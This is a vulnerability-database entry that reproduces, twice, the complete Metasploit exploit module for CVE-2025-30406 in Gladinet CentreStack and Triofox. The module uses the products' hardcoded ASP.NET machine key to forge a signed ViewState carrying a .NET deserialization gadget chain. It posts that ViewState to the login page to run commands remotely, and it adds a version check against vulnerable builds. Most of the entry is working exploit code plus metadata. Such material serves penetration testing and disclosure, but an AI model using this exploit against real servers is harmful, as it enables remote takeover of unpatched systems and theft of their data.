Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-

Published Aug 29, 2025 at 18:53

Modified May 28, 2025 at 18:51

Affected Product

Affected Versions # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'rex/exploit/view_state'

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

# base64 encoded machine key
MACHINE_KEY = 'NTQ5NjgzMjI0MkNDMzIyOEUyOTJFRUZGQ0RBMDg5MTQ5RDc4OUUwQzREN0MxQTVEMDJCQzU0MkY3QzYyNzlCRTlERDc3MEM5RURENUQ2N0M2NkI3RTYyMTQxMUQzRTU3RUExODFCQkY4OUZEMjE5NTdEQ0RERkFDRkQ5MjZFMTY='.freeze

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization',
'Description' => %q{
A vulnerability in Gladinet CentreStack and Triofox application using hardcoded
cryptographic keys for ViewState could allow an attacker to forge ViewState data.
This can lead to unauthorized actions such as remote code execution.
Both applications make use of a hardcoded machineKey in the IIS web.config file,
which is responsible for securing ASP.NET ViewState data. If an attacker obtains
the machineKey, they can forge ViewState payloads that pass integrity checks.
This can result in ViewState deserialization attacks, potentially leading to
remote code execution (RCE) on the web server.

Gladinet CentreStack versions up to 16.4.10315.56368 are vulnerable (fixed in 16.4.10315.56368).
Gladinet Triofox versions up to 16.4.10317.56372 are vulnerable (fixed in 16.4.10317.56372).
NOTE: There are other rebranded services that might be vulnerable and can be detected by this module.
},
'Author' => [
'Huntress Team', # discovery and detailed vulnerability write up
'H00die Gr3y' # this metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-30406'],
['URL', 'https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild'],
['URL', 'https://attackerkb.com/topics/7ebXn71J6O/cve-2025-30406']
],
'Platform' => 'win',
'Targets' => [
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Type' => :windows_command
}
]
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => '2025-04-03',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
},
'Privileged' => false
)
)

register_options([
OptString.new('TARGETURI', [ true, 'The base path to the Gladinet CentreStack or Triofox application', '/' ])
])
end

def execute_command(cmd, _opts = {})
# get the __VIEWSTATEGENERATOR value from the vulnerable page
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx')
})
unless res&.code == 200
fail_with(Failure::UnexpectedReply, 'Non-200 HTTP response received while trying to get the __VIEWSTATEGENERATOR value.')
end

html = res.get_html_document
if html
# html identifier for the __VIEWSTATEGENERATOR: <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="3FE2630A" />
generator = html.css('input#__VIEWSTATEGENERATOR')[0]['value']
viewstate_generator = [generator.to_i(16)].pack('V') unless generator.nil?
else
viewstate_generator = ['3FE2630A'.to_i(16)].pack('V')
end

output_format = 'raw'
viewstate_validation_algorithm = 'SHA256'
viewstate_validation_key = [Base64.strict_decode64(MACHINE_KEY)].pack('H*')

serialized = ::Msf::Util::DotNetDeserialization.generate(
cmd,
gadget_chain: :TextFormattingRunProperties,
formatter: :LosFormatter
)

serialized = Rex::Exploit::ViewState.generate_viewstate(
serialized,
extra: viewstate_generator,
algo: viewstate_validation_algorithm,
key: viewstate_validation_key
)
transformed = ::Msf::Simple::Buffer.transform(serialized, output_format)
vprint_status(transformed.to_s)

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx'),
'vars_post' => {
'__LASTFOCUS' => '',
'__VIEWSTATE' => transformed.to_s
}
})
unless res&.code == 302
fail_with(Failure::UnexpectedReply, 'Non-302 HTTP response received while trying to execute the payload.')
end
end

def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx')
})
return CheckCode::Safe('Failed to identify that Gladinet CentreStack/Triofox or similar service is running.') unless res&.code == 200 && res.body.include?('id="__VIEWSTATEGENERATOR" value="3FE2630A"')

if res.body.include?('CentreStack')
check_app = 'CentreStack'
elsif res.body.include?('Triofox')
check_app = 'Triofox'
else
check_app = 'Unknown'
end

build = res.body.match(/\(Build\s*.*\)/)
unless build.nil?
version = build[0].gsub(/[[:space:]]/, '').split('Build')[1].chomp(')')
rex_version = Rex::Version.new(version)
if check_app == 'CentreStack'
return CheckCode::Appears("Service #{check_app} (Build #{version})") if rex_version < Rex::Version.new('16.4.10315.56368')
elsif check_app == 'Triofox'
return CheckCode::Appears("Service #{check_app} (Build #{version})") if rex_version < Rex::Version.new('16.4.10317.56372')
elsif check_app == 'Unknown'
return CheckCode::Detected("Service #{check_app} (Build #{version})") if rex_version < Rex::Version.new('16.4.10317.56372')
end
return CheckCode::Safe("Service #{check_app} (Build #{version})")
end

CheckCode::Detected("Service #{check_app} (Build not detected)")
end

def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
execute_command(payload.encoded)
end
end

{
    "lastseen": "2025-08-29T19:16:06",
    "description": "A vulnerability in Gladinet CentreStack and Triofox application using hardcoded           cryptographic keys for ViewState could allow an attacker...",
    "published": "2025-08-29T18:53:50",
    "modified": "2025-05-28T18:51:29",
    "type": "metasploit",
    "title": "Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-30406"
    ],
    "sourceData": "# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n\nrequire 'rex/exploit/view_state'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  # base64 encoded machine key\n  MACHINE_KEY = 'NTQ5NjgzMjI0MkNDMzIyOEUyOTJFRUZGQ0RBMDg5MTQ5RDc4OUUwQzREN0MxQTVEMDJCQzU0MkY3QzYyNzlCRTlERDc3MEM5RURENUQ2N0M2NkI3RTYyMTQxMUQzRTU3RUExODFCQkY4OUZEMjE5NTdEQ0RERkFDRkQ5MjZFMTY='.freeze\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization',\n        'Description' => %q{\n          A vulnerability in Gladinet CentreStack and Triofox application using hardcoded\n          cryptographic keys for ViewState could allow an attacker to forge ViewState data.\n          This can lead to unauthorized actions such as remote code execution.\n          Both applications make use of a hardcoded machineKey in the IIS web.config file,\n          which is responsible for securing ASP.NET ViewState data. If an attacker obtains\n          the machineKey, they can forge ViewState payloads that pass integrity checks.\n          This can result in ViewState deserialization attacks, potentially leading to\n          remote code execution (RCE) on the web server.\n\n          Gladinet CentreStack versions up to 16.4.10315.56368 are vulnerable (fixed in 16.4.10315.56368).\n          Gladinet Triofox versions up to 16.4.10317.56372 are vulnerable (fixed in 16.4.10317.56372).\n          NOTE: There are other rebranded services that might be vulnerable and can be detected by this module.\n        },\n        'Author' => [\n          'Huntress Team', # discovery and detailed vulnerability write up\n          'H00die Gr3y' # this metasploit module\n        ],\n        'License' => MSF_LICENSE,\n        'References' => [\n          ['CVE', '2025-30406'],\n          ['URL', 'https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild'],\n          ['URL', 'https://attackerkb.com/topics/7ebXn71J6O/cve-2025-30406']\n        ],\n        'Platform' => 'win',\n        'Targets' => [\n          [\n            'Windows Command',\n            {\n              'Arch' => ARCH_CMD,\n              'Type' => :windows_command\n            }\n          ]\n        ],\n        'DefaultOptions' => {\n          'RPORT' => 443,\n          'SSL' => true\n        },\n        'DefaultTarget' => 0,\n        'DisclosureDate' => '2025-04-03',\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n          'Reliability' => [REPEATABLE_SESSION]\n        },\n        'Privileged' => false\n      )\n    )\n\n    register_options([\n      OptString.new('TARGETURI', [ true, 'The base path to the Gladinet CentreStack or Triofox application', '/' ])\n    ])\n  end\n\n  def execute_command(cmd, _opts = {})\n    # get the __VIEWSTATEGENERATOR value from the vulnerable page\n    res = send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx')\n    })\n    unless res&.code == 200\n      fail_with(Failure::UnexpectedReply, 'Non-200 HTTP response received while trying to get the __VIEWSTATEGENERATOR value.')\n    end\n\n    html = res.get_html_document\n    if html\n      # html identifier for the __VIEWSTATEGENERATOR: <input type=\"hidden\" name=\"__VIEWSTATEGENERATOR\" id=\"__VIEWSTATEGENERATOR\" value=\"3FE2630A\" />\n      generator = html.css('input#__VIEWSTATEGENERATOR')[0]['value']\n      viewstate_generator = [generator.to_i(16)].pack('V') unless generator.nil?\n    else\n      viewstate_generator = ['3FE2630A'.to_i(16)].pack('V')\n    end\n\n    output_format = 'raw'\n    viewstate_validation_algorithm = 'SHA256'\n    viewstate_validation_key = [Base64.strict_decode64(MACHINE_KEY)].pack('H*')\n\n    serialized = ::Msf::Util::DotNetDeserialization.generate(\n      cmd,\n      gadget_chain: :TextFormattingRunProperties,\n      formatter: :LosFormatter\n    )\n\n    serialized = Rex::Exploit::ViewState.generate_viewstate(\n      serialized,\n      extra: viewstate_generator,\n      algo: viewstate_validation_algorithm,\n      key: viewstate_validation_key\n    )\n    transformed = ::Msf::Simple::Buffer.transform(serialized, output_format)\n    vprint_status(transformed.to_s)\n\n    res = send_request_cgi({\n      'method' => 'POST',\n      'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx'),\n      'vars_post' => {\n        '__LASTFOCUS' => '',\n        '__VIEWSTATE' => transformed.to_s\n      }\n    })\n    unless res&.code == 302\n      fail_with(Failure::UnexpectedReply, 'Non-302 HTTP response received while trying to execute the payload.')\n    end\n  end\n\n  def check\n    res = send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx')\n    })\n    return CheckCode::Safe('Failed to identify that Gladinet CentreStack/Triofox or similar service is running.') unless res&.code == 200 && res.body.include?('id=\"__VIEWSTATEGENERATOR\" value=\"3FE2630A\"')\n\n    if res.body.include?('CentreStack')\n      check_app = 'CentreStack'\n    elsif res.body.include?('Triofox')\n      check_app = 'Triofox'\n    else\n      check_app = 'Unknown'\n    end\n\n    build = res.body.match(/\\(Build\\s*.*\\)/)\n    unless build.nil?\n      version = build[0].gsub(/[[:space:]]/, '').split('Build')[1].chomp(')')\n      rex_version = Rex::Version.new(version)\n      if check_app == 'CentreStack'\n        return CheckCode::Appears(\"Service #{check_app} (Build #{version})\") if rex_version < Rex::Version.new('16.4.10315.56368')\n      elsif check_app == 'Triofox'\n        return CheckCode::Appears(\"Service #{check_app} (Build #{version})\") if rex_version < Rex::Version.new('16.4.10317.56372')\n      elsif check_app == 'Unknown'\n        return CheckCode::Detected(\"Service #{check_app} (Build #{version})\") if rex_version < Rex::Version.new('16.4.10317.56372')\n      end\n      return CheckCode::Safe(\"Service #{check_app} (Build #{version})\")\n    end\n\n    CheckCode::Detected(\"Service #{check_app} (Build not detected)\")\n  end\n\n  def exploit\n    print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n    execute_command(payload.encoded)\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/gladinet_viewstate_deserialization_cve_2025_30406.rb",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/windows/http/gladinet_viewstate_deserialization_cve_2025_30406/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply